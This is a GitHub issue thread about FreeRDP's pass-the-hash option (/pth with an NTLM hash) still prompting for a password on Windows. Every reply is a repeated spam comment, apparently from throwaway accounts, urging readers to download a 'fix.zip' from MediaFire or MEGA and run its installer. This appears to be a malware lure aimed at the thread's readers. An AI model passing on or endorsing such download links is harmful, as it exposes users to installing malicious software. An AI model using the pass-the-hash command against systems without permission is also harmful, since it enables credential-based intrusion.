### ISSUE TITLE
Authentication with Pass-the-Hash is bot working on windows

### ISSUE THREAD

**Issue by zezezez** [FreeRDP/FreeRDP#10507]
**Describe the bug**
Authentication with Pass-the-Hash is bot working on windows.
My command line is  **wfreerdp /v:192.168.1.2 /pth:ntlmhash /u:administrator**.
But it still prompts me to input password of 192.168.1.2.

**To Reproduce**
1.
The version of wfreerdp.exe I'm using is from https://ci.freerdp.com/job/freerdp-nightly-windows/1586/arch=win64,label=vs2017/ .
2.
Then I input "wfreerdp /v:192.168.1.2 /pth:ntlmhash /u:administrator" in command line.

![20240825004603](https://github.com/user-attachments/assets/3102edbd-e3e3-42c7-a034-03b71ed60758)

It prompts me that I need to enter the administrator password of 192.168.1.2.

But I'm using **pth**, so normally I shouldn't need to enter a password!

**Environment (please complete the following information):**
 - OS: Windows10 Pro
 - Architecture: amd64

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
